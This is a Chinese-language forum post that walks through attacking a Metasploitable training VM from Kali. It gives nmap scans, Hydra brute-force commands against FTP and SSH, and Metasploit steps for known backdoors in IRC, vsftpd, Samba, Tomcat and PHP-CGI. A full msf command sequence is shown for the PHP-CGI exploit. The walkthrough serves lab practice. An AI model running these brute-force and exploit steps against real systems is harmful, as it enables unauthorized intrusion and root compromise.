查看: 1928|回复: 0

[系统安全] kali渗透metasploitable靶机

920 主题	37 听众	1364 积分

超级版主

Rank: 8 Rank: 8

TA的每日心情

	奋斗 2019-10-18 11:20

签到天数: 678 天

[LV.9]以坛为家II

电梯直达

楼主

|只看该作者 |倒序浏览

扫描阶段：

工具：Nmap

隐蔽扫描 nmap -sS 192.168.8.135

端口爆破：FTP、SSH等

工具：Hydra

备用字典

爆破FTP

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt ftp://192.168.8.135

爆破SSH

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.8.135 ssh

登陆系统：

端口渗透：

6667——-irc_3281_backdoor

利用metasploit

成功获取会话，root权限

6200——-vsftpd_234_backdoor

利用metasploit

反弹会话，root权限

1524——-ingrelock_backdoor

利用telnet连接1524，直接返回root会话

1099——-distcc程序漏洞—-ingrelock

利用metasploit

返回会话

139——-samba为3.0漏洞

先用nmap进行详细扫描

nmap -v -A -T4 192.168.8.135

Samba 3.0.20

利用metasploit

返回会话，root权限

8180——-Apache Tomcat弱口令

使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破

用默认自带的字典即可

爆破出tomcat/tomcat

使用use exploit/multi/http/tomcat_mgr_upload模块

获取meterpreter会话

80——-PHP CGI参数注入执行漏洞

msf > search cve:2012-1823

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > show options

msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135

rhost => 192.168.8.135

msf exploit(php_cgi_arg_injection) > run

metasploitable靶机, kali渗透, 系统安全

转播0 淘帖0 分享0 收藏0 赞1 踩0

帖子永久地址：

黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见，与本论坛立场无关
2、本站所有主题由该帖子作者发表，该帖子作者与黑帽联盟享有帖子相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体，但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题，请立即告知本站，本站将及时予与删除并致以最深的歉意
7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

		自动登录	找回密码
密码			会员注册

[系统安全] kali渗透metasploitable靶机

相关帖子

个人中心